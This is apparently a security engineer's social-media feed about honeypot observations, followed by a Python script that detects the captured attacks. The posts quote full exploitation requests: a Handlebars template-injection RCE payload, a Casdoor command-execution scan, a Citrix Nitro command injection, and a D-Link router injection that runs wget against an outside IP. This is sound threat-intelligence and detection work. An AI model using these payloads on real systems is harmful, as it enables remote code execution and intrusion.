Niels Heinen

70 Followers
61 Following
85 Posts
Information security engineer - security at scale - honeypots
GitHub: https://github.com/mrheinen

@virustotal maybe it's worth looking into increasing the free quota based on the quality of reports. If a source reports a lot of malware with unique signatures then perhaps you don't want to enforce the default quota and miss out on reports (on days where the source is busy).

I bet you already have some sort of usefulness score for sources anyway?!

#infosec #dfir #security #cybersecurity #virustotal

Seeing exploitation of CVE-2026-33937 but they target the example URI (/api/email/preview) that is only present in the writeup at https://github.com/EQSTLab/CVE-2026-33937

Here is a full request:

POST /api/email/preview HTTP/1.1
Host: x.x.x.x:8080
Connection: close
Content-Length: 585
Content-Type: application/json
User-Agent: Go-http-client/1.1

{"subject":"Interactive RCE","tpl":{"body":[{"escaped":true,"loc":null,"params":[{"data":false,"depth":0,"loc":null,"original":"this","parts":[],"type":"PathExpression"},{"loc":null,"original":1,"type":"NumberLiteral","value":"{},{})) + process.mainModule.require('child_process').execSync('echo __HBSRCE__;id;uname -a;hostname;nproc;echo __HBSRCE___END').toString() //"}],"path":{"data":false,"depth":0,"loc":null,"original":"lookup","parts":["lookup"],"type":"PathExpression"},"strip":{"close":false,"open":false},"type":"MustacheStatement"}],"loc":null,"strip":{},"type":"Program"}}

#dfir #honeypot #infosec #cybersecurity


There seems to be a remote code execution issue in Casdoor? My honeypots are seeing these scans:

GET /api/run-casbin-command?language=exec&args=["enforce","-m","[request_definition]\nr = sub, obj, act\n\n[policy_definition]\np = sub, obj, act\n\n[role_definition]\ng = _, _\n\n[policy_effect]\ne = some(where (p.eft == allow))\n\n[matchers]\nm = r.sub == p.sub","-p","p, x, x, x","sh","-c","id"]&t=2026-03-30T16:12:50Z&m=1191e3dce3682e9382680387ffe783bb87cd213a48f4f1fa6c10644d039f4dc6 HTTP/1.1
Host: x.x.x.x:8000
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15

#casdoor #honeypot #infosec #dfir #cybersecurity

Citrix Nitro SDK - Command Injection

Citrix Nitro SDK - Command Injection. CVE-119834CVE-2015-2838 . webapps exploit for Linux platform

Exploit Database

Interesting Netscaler payload caught by my Lophiid honeypots:

GET /nitro/v1/config/systemfile?args=filename:/etc/passwd%3Bping%20-c%204%20178.16.54.17 HTTP/1.1
Host: x.x.x.x
Connection: close
X-Nitro-Pass: nsroot
X-Nitro-User: nsroot

Does anyone know this vuln?

#honeypot #dfir #infosec #cybersecurity

@cR0w yes I think so too, that's also where I got the inspiration to add it to my honeypots. I was hoping for some more targeted attacks with this one and not the usual large scans (given that it's not such a popular service) but I guess I was naive ;/

After adding emulation of HPE OneView to my honeypots, I'm seeing quite an uptick in scans for it. Could be coincidence but regardless it's interesting to see so much traffic for a rather unpopular (?) service. Shodan for example shows 27 instances at the moment.

#infosec #cybersecurity #dfir #honeypot

@hrbrmstr @iagox86 interesting!

Interesting! Thanks for sharing.

So I only have 50 honeypots (for personal entertainment) and guess you guys have quite a few more than that :). More importantly, I have them across 6 datacenters which really limits the coverage.

But I'm not complaining: I get more data than I can handle and have fun playing with it (and trying to extract new info in new ways when possible).

Just under a year ago I was planning to leave Google after 10 years. Since then I've been considering what's next (and doing some advisory work on the side).

I've slowly been giving more and more thought to how to give back in a sustainable way that works for me.

With that in mind, if you know of any organisations who offer security consulting/testing (pentesting) for NGOs or other worthy causes, please share 🙏

(Please re-toot for reach)

Suddenly seeing exploitation attempts of CVE-2019-17621 (D-Link DIR-859 Wi-Fi router RCE). In 3 years of running my Lophiid honeypots, this is the first time I've seen this specific vuln being exploited.

An example request:

SUBSCRIBE /gena.cgi?service=`echo ; wget http://185.93.89.75/81_CAJ0BIC0CCF0BJA_CVE-2019-17621 -O /dev/null; echo >` HTTP/1.1
Host: x.x.x.x
Callback: <http://192.168.0.2:1337/ServiceProxy0>
Connection: close
Nt: upnp:event
Timeout: Second-1800
User-Agent: Mozilla/1.0

#honeypot #dfir #infosec #cybersecurity #threatintel
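The four captured requests on this page (the Handlebars AST payload against /api/email/preview, the Casdoor /api/run-casbin-command scan, the Citrix Nitro systemfile request and the D-Link gena.cgi request) lend themselves to a single triage script for honeypot captures. The Python below is an added example, not code from the posts above or from the Lophiid project: it parses a raw HTTP/1.1 request and applies one detection rule per observed pattern. The sample captures are constructed from the posts and trimmed; the callback addresses are replaced with documentation-range placeholders and the Casdoor `m=` value with a placeholder string.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

# Shell metacharacters that have no business inside a filename or a UPnP service name.
SHELL_META = re.compile(r"[;`|&$]")


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, path, query dict, headers, body).

    The request line is split on its first and last space so that a query string
    containing literal spaces (as in the Casdoor capture) still parses.
    """
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, _, rest = lines[0].partition(" ")
    target, _, _version = rest.rpartition(" ")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    return method, parts.path, parse_qs(parts.query, keep_blank_values=True), headers, body


def _has_non_numeric_number_literal(node) -> bool:
    """Walk a Handlebars AST (as JSON) and flag a NumberLiteral whose value is not a number."""
    if isinstance(node, dict):
        if node.get("type") == "NumberLiteral" and not isinstance(node.get("value"), (int, float)):
            return True
        return any(_has_non_numeric_number_literal(v) for v in node.values())
    if isinstance(node, list):
        return any(_has_non_numeric_number_literal(v) for v in node)
    return False


def find_rce_indicators(raw: str) -> list:
    """Return the names of the detection rules that fire on one captured request."""
    _method, path, query, headers, body = parse_request(raw)
    hits = []
    # Rule 1: JSON body carrying a Handlebars AST with code smuggled into a NumberLiteral.
    if headers.get("content-type", "").startswith("application/json") and body:
        try:
            doc = json.loads(body)
        except json.JSONDecodeError:
            doc = None
        if doc is not None and _has_non_numeric_number_literal(doc):
            hits.append("handlebars-ast-literal-injection")
    # Rule 2: Casdoor casbin command endpoint invoked with language=exec.
    if path == "/api/run-casbin-command" and "exec" in query.get("language", []):
        hits.append("casdoor-run-casbin-command-exec")
    # Rule 3: Nitro systemfile request whose filename argument contains shell metacharacters.
    if path.startswith("/nitro/v1/config/systemfile") and any(SHELL_META.search(a) for a in query.get("args", [])):
        hits.append("nitro-systemfile-shell-meta")
    # Rule 4: UPnP gena.cgi subscription whose service parameter contains shell metacharacters.
    if path.endswith("/gena.cgi") and any(SHELL_META.search(s) for s in query.get("service", [])):
        hits.append("gena-service-shell-meta")
    return hits


def _req(request_line: str, headers: list, body: str = "") -> str:
    """Assemble a raw request string from its parts (constructed test data helper)."""
    return "\r\n".join([request_line, *headers, "", body])


# Constructed sample captures, trimmed from the requests quoted in the posts above.
HANDLEBARS_AST = {"subject": "Interactive RCE", "tpl": {"type": "Program", "body": [{
    "type": "MustacheStatement",
    "path": {"type": "PathExpression", "original": "lookup", "parts": ["lookup"]},
    "params": [
        {"type": "PathExpression", "original": "this", "parts": []},
        # A NumberLiteral should carry a number; here "value" carries JavaScript instead.
        {"type": "NumberLiteral", "original": 1,
         "value": "{},{})) + process.mainModule.require('child_process').execSync('id') //"},
    ]}]}}

SAMPLES = {
    "handlebars": _req("POST /api/email/preview HTTP/1.1",
                       ["Host: x.x.x.x:8080", "Content-Type: application/json"],
                       json.dumps(HANDLEBARS_AST)),
    "casdoor": _req("GET /api/run-casbin-command?language=exec&args="
                    + json.dumps(["enforce", "-m", "[request_definition]\nr = sub, obj, act",
                                  "-p", "p, x, x, x", "sh", "-c", "id"])
                    + "&t=2026-03-30T16:12:50Z&m=PLACEHOLDER HTTP/1.1",
                    ["Host: x.x.x.x:8000", "Accept: */*"]),
    "nitro": _req("GET /nitro/v1/config/systemfile?args=filename:/etc/passwd%3Bping%20-c%204%20198.51.100.10 HTTP/1.1",
                  ["Host: x.x.x.x", "X-Nitro-User: nsroot"]),
    "gena": _req("SUBSCRIBE /gena.cgi?service=`echo ; wget http://198.51.100.10/x -O /dev/null; echo >` HTTP/1.1",
                 ["Host: x.x.x.x", "Nt: upnp:event"]),
    "benign-nitro": _req("GET /nitro/v1/config/systemfile?args=filename:ns.conf HTTP/1.1", ["Host: x.x.x.x"]),
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:14s} -> {find_rce_indicators(raw) or ['clean']}")
```

The Handlebars rule deliberately checks the AST shape (a NumberLiteral whose value is not numeric) rather than the command string, so it still fires on variants that do not use the example URI from the writeup or the `echo __HBSRCE__` marker; the other three rules key on the endpoint plus shell metacharacters in a parameter that should never contain them, which keeps the benign Nitro request clean.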